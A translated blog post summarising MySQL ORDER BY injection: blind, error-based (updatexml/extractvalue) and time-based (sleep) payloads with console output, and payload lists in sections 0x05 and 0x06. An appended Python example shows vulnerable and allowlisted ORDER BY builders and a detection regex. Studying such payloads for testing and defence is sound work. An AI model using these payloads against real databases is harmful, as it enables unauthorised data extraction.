    Summary: order by injection

    I plan to summarise, one by one, the things I have already studied, including some articles I read earlier and a few small tricks. Let's start with injection.

    0x01 Blind injection

    1. Telling 1 from 0

    a. if

    mysql> select * from user where user_id=1 order by 1-if(substr(version(),1,1)=5,1,(select 1 union select 2));
    +-------+-----------+---------+
    | user  | password  | user_id |
    +-------+-----------+---------+
    | admin | admintest |       1 |
    +-------+-----------+---------+
    1 row in set (0.00 sec)
    

    b. rand

    mysql> select rand(true);
    +---------------------+
    | rand(true)          |
    +---------------------+
    | 0.40540353712197724 |
    +---------------------+
    1 row in set (0.00 sec)
    
    mysql> select rand(false);
    +---------------------+
    | rand(false)         |
    +---------------------+
    | 0.15522042769493574 |
    +---------------------+
    1 row in set (0.00 sec)
    

    Here rand(true) and rand(false) return different values, so the row order produced by the ORDER BY differs as well.

    mysql> select * from user order by 1-rand(substr(version(),1,1)=5);
    +-------+-----------+---------+
    | user  | password  | user_id |
    +-------+-----------+---------+
    | test  | testadmin |       2 |
    | admin | admintest |       1 |
    | sp4rk | sp4rktest |       3 |
    +-------+-----------+---------+
    3 rows in set (0.02 sec)
    
    

    c. regexp

    mysql> select * from user order by 1-if(1=(select 1 regexp if(1=1,1,0x00)),1,1);

    0x02 Error-based injection

    mysql> select * from user order by 1-updatexml(1,concat(0x5e24,version(),0x5e24),0);
    ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
    mysql> select * from user order by 1-extractvalue(1,concat(0x5e24,version(),0x5e24));
    ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
    

    0x03 Time-based injection

    mysql> select * from user order by 1-if(ascii(substr(user(),1,1))=114,sleep(5),0);

    0x04 At the asc/desc position

    1. Blind injection

    mysql> select user from user order by user,if(substr(version(),1,1)=5,1,(select 1 union select 2)) desc;
    +-------+
    | user  |
    +-------+
    | admin |
    | sp4rk |
    | test  |
    +-------+
    

    Error-based and time-based variants are the same as above.

    0x05 Sorting on a logical difference

    mysql> select user from user order by 1-if(1=1,user,user_id);
    +-------+
    | user  |
    +-------+
    | admin |
    | test  |
    | sp4rk |
    +-------+
    3 rows in set, 3 warnings (0.00 sec)
    
    mysql> select user from user order by 1-if(1=1,user_id,user);
    +-------+
    | user  |
    +-------+
    | sp4rk |
    | test  |
    | admin |
    +-------+
    
    payload:
    ,if(1=1,user_id,user)
    ,(case when (1=1) then user_id else user end)
    ,ifnull(null,user_id)
    ,rand(1=1)
    
    

    0x06 Using errors to make the judgement

    payload:
    if(1=1,1,(select 1 union select 2))  correct
    if(1=2,1,(select 1 union select 2))  error
    if(1=1,1,(select 1 from information_schema.tables))  correct
    if(1=2,1,(select 1 from information_schema.tables))  error
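    Application-side mitigation, added here as an example and not part of the original post: ORDER BY identifiers cannot be bound as prepared-statement parameters, so the vulnerable concatenation is shown next to an allowlist builder that only ever uses the client's value as a dictionary key, plus a heuristic for flagging non-identifier sort parameters in request logs. The handler parameters (sort, direction), the helper names and the two-column allowlist are assumptions.

```python
import re

# Added example, not code from the original post. Assumed: a web handler
# that takes ?sort=<column>&direction=<asc|desc> and builds the ORDER BY
# clause for a query over the `user` table shown in the post.

# Allowlist: the only sort keys a client may name, mapped to fixed
# quoted identifiers. ORDER BY targets cannot be bound as prepared-
# statement parameters, so lookup (never interpolation) is the fix.
SORT_COLUMNS = {"user": "`user`", "user_id": "`user_id`"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

# A legitimate sort key is a bare identifier; operators, parentheses,
# commas or quotes are the shape of the payloads on this page.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

def build_order_by_unsafe(sort: str, direction: str) -> str:
    """Vulnerable form: untrusted input pasted straight into the clause.
    A value such as '1-if(...)' or 'user,if(1=1,user_id,user)' becomes
    part of the query, which is what every payload above relies on."""
    return f"ORDER BY {sort} {direction}"

def build_order_by(sort: str, direction: str = "asc") -> str:
    """Hardened form: the client value is only ever a dictionary key."""
    column = SORT_COLUMNS.get(sort.strip().lower())
    order = SORT_DIRECTIONS.get(direction.strip().lower())
    if column is None or order is None:
        raise ValueError(f"unsupported sort parameter: {sort!r} {direction!r}")
    return f"ORDER BY {column} {order}"

def accepts(sort: str, direction: str = "asc") -> bool:
    """True if the hardened builder would accept these values."""
    try:
        build_order_by(sort, direction)
        return True
    except ValueError:
        return False

def looks_like_order_by_injection(value: str) -> bool:
    """Detection heuristic for request logs or a WAF rule: flag a sort
    parameter that is not a plain identifier."""
    return IDENTIFIER.fullmatch(value.strip()) is None

if __name__ == "__main__":
    for value in ("user", "1-rand(1=1)", "user,if(1=1,user_id,user)"):
        print(f"{value!r}: accepted={accepts(value)} "
              f"suspicious={looks_like_order_by_injection(value)}")
```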
    
    Original source: https://www.cnblogs.com/spark-xl/p/9080398.html